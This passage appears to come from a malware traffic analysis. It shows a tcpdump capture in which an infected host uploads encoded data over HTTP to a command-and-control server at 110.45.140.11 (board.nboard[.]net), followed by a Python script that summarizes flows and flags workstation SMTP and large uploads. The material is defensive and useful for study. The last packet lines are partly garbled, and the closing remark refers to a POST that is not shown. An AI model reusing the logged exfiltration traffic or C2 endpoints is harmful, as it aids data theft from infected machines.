E…..@…O…..n-…s.P….up..P….S..AoGcoEPWBct1gXtbyaKNutg8uRBa38RcNBoYCEu676ZeLfxotVpmN5hacNSnCbfF6gWWKq4dCA=6y389OXXbeoPh3CsTqi7EkxnH/aV9ALBkqlD9Oyss/B5niXy3UzwkBixwLIk5BY8leBRTcLgnOTAeGCPtXf6z6loH2PoF8=VgFKX-1NW4sLrV9VXhBkQQF4NmYXoNSlWLKtTtisZ3VI/jZ1y3ffLNbT1Au60IkFzNyLFU/eiL2Kl1=nJ9gjIYA2TdGcsrrcmSJYA-=AFW=08L12GUBXWF7/ryqwkcA4f0EF1TWZUa-L8SJoezsUldJL9R14WdUM300a1oNuMnd4LZr/B-19bGwGfYciOBZPY3l1pn9iYgYQtBnDOtL59OD23rruPzeZqYQ91wJMbUlCjQh6zAgDwhuYzy5jChLnLoyKrtA42UmEDhyMmeUjMVPi5Wk5PcN6qcQbqR5-qB6JWdy056uGKrNn0Nihg8TIYADOz7grBlV3rC1Nr0X1RlL-/=FCDIPN2pDtIrawCSKnyQ2LzB4yY2FsB7VCddKDmm6YxGUkZowYJp/exDl1ZzpHr=CFBIMmM0zou62GYSThD8uUtXE5EYEBeghaJeDagWZcwfhjY5oZhESOpL44SnwpCpqdpPM8zQfdV10TEzwD4pnBcQqAVcYdXota=wV6ZaiC-Ur98hX-6HEWCO7kSIzWTcsAIYh2Mz=5DYL700gqQINxo5SKDCsA27s2OW2W4SQWaReFDysozJuc2-onKFz=f0zWerQ7/QCFnMnsuifSYbifmJsZk13/e-21JeP5qoSohtDiBinaLl6zBC34axLz7lkqQxDHl2RIh3syjoy5js-HxRh1S1qMSLVIa-oAjNKEhKEwhK8oizKTIWnjFh699y7RsFcoRzzb1h1FSjBXPTaSHGTL414y/Ywb6rb5jfD0E=XF0E-H0F/NhkH2HADkt=QOA4AuSiPr3IM9ICWs5aXy4N/BpglA4xUHjludqAZB6XD-6R5-EtgRNiUagwqhypLQMAh7qN-6EhjCs0KqTxd8ps9h2H00N1VTcfohfre44fHXCaZLdU53yg9Xa6Zmj=wUg8jT4YjpC7hKpFm20MOqrxSGG/F2-6YIKI1RtWTep7AWMHcQYdga5gYSAIB/31uCWIjXz-s0oqoMJnTO-0unL/mdDs0DAZFq3g4=gQJ02feBqJaWLaFOcVDNFydul/GC21QSRM1SUS3pBiV52-IQws0qXwl/eXL1LyRsUVd7xC8WWiTNIIheSc2MAqow6Vo22ZACWrwaj-74ff7GEaHZmbb/EQscbVLfXneSJtsQ7O/EZFOxDjLZA4fW6SqsqrynSejqlwV6pM-zUJexTwwW/FyITEKohah1T73W=lJjYES2YcCHPR4x6rXo5qJMYVna4IS3Z04=6eJ/A/gVu2syfu0D3Oi5xHU4akJ=pPkgwDot3U
2012-10-07 11:41:32.097292 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 8761, win 64240, length 0
E..(A…..U-n-…….P.sup……P….R……..
2012-10-07 11:41:32.097346 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 10221:11681, ack 1, win 64240, length 1460
E…..@…O…..n-…s.P…rup..P…L…i0pOmYgD3pIgohTLyzXsq8NDZqlgXTWin858YaJmjqI4OXgaSgbGsiNkgV1rdunO0YMUBickon-aehXqbtxy5K9ffSEoLcnMmaj2KfyUzyTsED/yUu8AMRsARg6p3XU68nUcC9TVnpBoSiLibfmaxQWQxtKsYl4REjNaXNhL2/fQTjk2tKfIFlRWfbRSkRkTHcRUkYFqIx3par2uJSMFHxpWNNZxRDGmd1XCEtnxMAMEQzA4uYKcI83q27nH8yENNQnkoyL=tj0qs8IJWWZG8K/39V3yGV1==XThRLrD72y6Aq6MsIey1fOCKcxpBiQs7Vd-hctzJNiFK32z6Swur3afXXVCkWL5/nmY=bX5FW78G/b-cbuUmjWHx3iSm=rJlZE1MGzaLowBNdbTn74l/aN7LACb0ZD7juB6pWeGUs4zjt6o25ohs/3XdNTzlb/rxh//72ljhRpNdfgQN73flu53yQHTXd4VyzaJwZbwu5E1VS5Xe2-X2ErJ9OjppxQ6xrApDzt-g2FJ86=yYrKKIQsKMSBeK6ZJwdSrObMRmpsY1gT8E4yjAdEzw45n2YKNPICTk1E2maO74ikRyyzaM7tz11CnT/-pOjQFfV6JB4ogoNHCfByujpHKOxXVw/bHUYM/WOh8qPkMa9iGyMKm2sXBV7tk48=KCLXairQkqrBCB=IXckaEP/U/SAMMxghuoa-Nq8Ha=7V5bfIjk5IX0nhuF8b7DZK/9LKmtR8dpuWLXF0IGXOhGn651aK=ThM3HKTqLVyQQVmqbLUJoZy5gDCmbglCI1KUdzjtR=zGbo/gcQMBemk/FXz1gQQP1YxC0DpJeeNco7b7ip6EK44dy8COGl0CqiySL/6FqE1N0ALhF74lwQxL49VqkXq3gS=2LaJoioqVuwPjoTFob4Ld5Et8d2pfBiKBPeUPqA13=EiiZOI80hDcFZ06D29mdpVYUcxZjLTLMVkIJtwRq4fZKL=A7-s9jq/Fw5axnudMBl2mOUlZG/inolu5qu-h1d26ltkWdHTP4NPzPNcuYp8u1hNJ2WSeZelknF7T5FZ4F5LT3phiNxeP1EUKiQYfJCx9Zk0VebuEsmUzlrwNQTLaV8BUgj11LKjSs=Jhgn5ZWLEaA2Oexpbwjgi-aAKxB/MMYa5jrG2D=zSmmwyAR48qJOOr=qaW8AFX4xjHDpeoM=SZBHdDHegGhwNTQ=eqVzOCJQqbHbKM4Wq9TIYTDFaXMnX/jhsqNdWFYLO0N7eXX4famqEptzRCK=AnW5Hw4O6bPkGfUR7WtutBTmyVIoZS/dd=BelXfpwKBsiMpaWngbcN9OLy2kq4HsuCrom1HV438WABfJoNO/Gjql5GWFEM9gQjBjTN/opG9-X6prZuawiEYRLPi94wPbl5z7U-qtO8Aa38/b4IAJhREmT4cnmLaTbUwEix0YfwZfcACuD/1CGmEho1hO/I
2012-10-07 11:41:32.097378 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 10221, win 64240, length 0
E..(A…..U,n-…….P.sup…..rP………….
2012-10-07 11:41:32.097431 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [P.], seq 11681:11892, ack 1, win 64240, length 211
E…..@…Tr….n-…s.P…&up..P…….tGaChzeJolPbTyVtxPRdobc1uroQH0ijgdkRmAq5xtg0XZJGmZ6=aEk2HrwDlhV-EpjU7MNqSQTKM/bexl4fp7/lllsSNWaogi1NhY-CNgRRqlaYpbO5i9pnsG-FnQhkb06jDnfiPwfAUXqVqwZx7go1pVNzGmmWQ7VzMOpe1zL4jCxgwckUM0PzIJBa2lj301ShqEqIz1bq&tlink=
2012-10-07 11:41:32.097460 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 11681, win 64240, length 0
E..(A…..U+n-…….P.sup…..&P………….
2012-10-07 11:41:32.097527 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [F.], seq 11892, ack 1, win 64240, length 0
E..(..@…UD….n-…s.P….up..P…….
2012-10-07 11:41:32.097559 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 11892, win 64240, length 0
E..(A…..U*n-…….P.sup……P………….
2012-10-07 11:41:32.097824 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 11893, win 64239, length 0
E..(A…..U)n-…….P.sup……P………….
2012-10-07 11:41:32.580045 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [P.], seq 1:325, ack 11893, win 64239, length 324
E..lA…..S.n-…….P.sup……P…F…HTTP/1.1 302 Found
Date: Mon, 17 Dec 2012 03:14:07 GMT
Server: Microsoft-IIS/5.0
P3P: CP='CAO PSA CONi OTR OUR DEM ONL'
X-Powered-By: PHP/4.3.10
Set-Cookie: nb_c_kbaksan_1_133032=hjpWxrJoyZhlc
Location: read.php?db=kbaksan_1&n=133032&p=1
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

0

2012-10-07 11:41:32.680744 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [P.], seq 1:325, ack 11893, win 64239, length 324
E..lA…..S.n-…….P.sup……P…F…HTTP/1.1 302 Found
Date: Mon, 17 Dec 2012 03:14:07 GMT
Server: Microsoft-IIS/5.0
P3P: CP='CAO PSA CONi OTR OUR DEM ONL'
X-Powered-By: PHP/4.3.10
Set-Cookie: nb_c_kbaksan_1_133032=hjpWxrJoyZhlc
Location: read.php?db=kbaksan_1&n=133032&p=1
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

0

2012-10-07 11:41:32.680777 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], ack 325, win 63916, length 0
E..(..@…UC….n-…s.P….up..P…….
2012-10-07 11:41:34.019921 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [FP.], seq 325, ack 11893, win 64239, length 0
E..(A…..U&n-…….P.sup……P………….
2012-10-07 11:41:34.019960 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], ack 326, win 63916, length 0
E..(..@…UB….n-…s.P….up..P…….
2012-10-07 11:41:37.016064 IP 172.16.253.129.1140 > 110.45.140.11.80: Flags [S], seq 3631868467, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…U9….n-…t.P.y.3….p……………
2012-10-07 11:41:37.244221 IP 110.45.140.11.80 > 172.16.253.129.1140: Flags [S.], seq 3149882171, ack 3631868468, win 64240, options [mss 1460], length 0
E..,A…..U!n-…….P.t..c;.y.4`………….
2012-10-07 11:41:37.244263 IP 172.16.253.129.1140 > 110.45.140.11.80: Flags [.], ack 1, win 64240, length 0
E..(..@…U@….n-…t.P.y.4..c 110.45.140.11.80: Flags [P.], seq 1:450, ack 1, win 64240, length 449
E…..@…S~….n-…t.P.y.4..c
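As an added example that is not part of the original post, the Python below parses the one-line tcpdump packet summaries from the capture above and produces the triage view an analyst wants from it: which name resolved to the C2 address, which outbound flows the infected host opened, how many bytes each carried, and which of them deserve a finding (SMTP spoken directly from a workstation, as the post's title describes, and a large HTTP upload). The victim address 172.16.253.129 and the 8192-byte upload threshold are assumptions chosen for this capture; the sample lines are copied from the packet headers above with the -A payload dumps left out.

```python
"""Flow summary from tcpdump one-line packet headers (added example)."""
import re
from collections import defaultdict

VICTIM = "172.16.253.129"   # infected host in this capture (assumption)
UPLOAD_THRESHOLD = 8192     # bytes; threshold chosen for this example

# Packet header lines copied from the capture on this page (payloads omitted).
CAPTURE_EXCERPT = """\
2012-10-07 11:39:13.574688 IP 172.16.253.129.53 > 4.2.2.2.53: 26791+ A? board.nboard[.]net. (34)
2012-10-07 11:39:13.636591 IP 4.2.2.2.53 > 172.16.253.129.53: 26791 1/0/0 A 110.45.140.11 (50)
2012-10-07 11:39:13.638676 IP 172.16.253.129.1135 > 110.45.140.11.80: Flags [S], seq 2194421301, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2012-10-07 11:39:13.886042 IP 172.16.253.129.1135 > 110.45.140.11.80: Flags [P.], seq 1:450, ack 1, win 64240, length 449
2012-10-07 11:41:30.928728 IP 172.16.253.129.1138 > 119.161.5.253.25: Flags [P.], seq 1:13, ack 39, win 64202, length 12
2012-10-07 11:41:31.844100 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [S], seq 4229423237, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2012-10-07 11:41:32.096731 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 1:1461, ack 1, win 64240, length 1460
2012-10-07 11:41:32.096817 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 1461:2921, ack 1, win 64240, length 1460
2012-10-07 11:41:32.096919 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 2921:4381, ack 1, win 64240, length 1460
2012-10-07 11:41:32.096967 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 4381:5841, ack 1, win 64240, length 1460
2012-10-07 11:41:32.097074 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 5841:7301, ack 1, win 64240, length 1460
2012-10-07 11:41:32.097159 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 7301:8761, ack 1, win 64240, length 1460
2012-10-07 11:41:32.097262 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 8761:10221, ack 1, win 64240, length 1460
2012-10-07 11:41:32.097346 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 10221:11681, ack 1, win 64240, length 1460
2012-10-07 11:41:32.097431 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [P.], seq 11681:11892, ack 1, win 64240, length 211
"""

PKT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): (?P<rest>.*)$")
DNS_A_RE = re.compile(r"\d+ \d+/\d+/\d+ A (?P<ip>\d+\.\d+\.\d+\.\d+)")
LEN_RE = re.compile(r"length (?P<len>\d+)$")


def parse_line(line):
    """Parse one tcpdump header line; returns None for payload/continuation lines."""
    m = PKT_RE.match(line)
    if not m:
        return None
    p = m.groupdict()
    p["sport"], p["dport"] = int(p["sport"]), int(p["dport"])
    lm = LEN_RE.search(p["rest"])
    p["length"] = int(lm.group("len")) if lm else 0   # DNS lines carry no TCP length
    return p


def summarize(text, victim=VICTIM):
    """Return (dns, flows): names the victim resolved and the byte count of
    every flow it originated, keyed by (source port, destination, dest port)."""
    dns, pending = {}, {}        # name -> answer ip; DNS txid -> queried name
    flows = defaultdict(lambda: {"bytes": 0, "first": None, "syn": False})
    for line in text.splitlines():
        p = parse_line(line)
        if p is None:
            continue
        rest = p["rest"]
        if p["dport"] == 53 and " A? " in rest:          # query: "26791+ A? name. (34)"
            pending[rest.split()[0].rstrip("+")] = rest.split(" A? ")[1].split()[0].rstrip(".")
        elif p["sport"] == 53:                            # answer: "26791 1/0/0 A ip (50)"
            am = DNS_A_RE.match(rest)
            txid = rest.split()[0]
            if am and txid in pending:
                dns[pending.pop(txid)] = am.group("ip")
        elif p["src"] == victim:
            f = flows[(p["sport"], p["dst"], p["dport"])]
            f["bytes"] += p["length"]
            f["first"] = f["first"] or p["ts"]
            f["syn"] = f["syn"] or "Flags [S]" in rest
    return dns, dict(flows)


def findings(text, victim=VICTIM):
    """Label each victim-originated flow for triage, earliest first."""
    dns, flows = summarize(text, victim)
    rdns = {ip: name for name, ip in dns.items()}
    out = []
    for (sport, dst, dport), f in sorted(flows.items(), key=lambda kv: kv[1]["first"]):
        name = rdns.get(dst, dst)
        if dport == 25:
            out.append((dst, dport, "workstation-smtp", f"{victim}:{sport} -> {name}:25"))
        elif dport == 80 and f["bytes"] >= UPLOAD_THRESHOLD:
            out.append((dst, dport, "large-http-upload", f"{f['bytes']} bytes to {name} from port {sport}"))
        elif dport == 80:
            out.append((dst, dport, "http-beacon", f"{f['bytes']} bytes to {name} from port {sport}"))
    return out


if __name__ == "__main__":
    for item in findings(CAPTURE_EXCERPT):
        print(*item)
```

The byte count it produces for the port-1139 flow (11891) matches the sequence range 11681:11892 in the last data segment, which in turn matches the 11328-byte Content-Length plus headers of the POST above, a useful consistency check when carving the upload out of a pcap.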
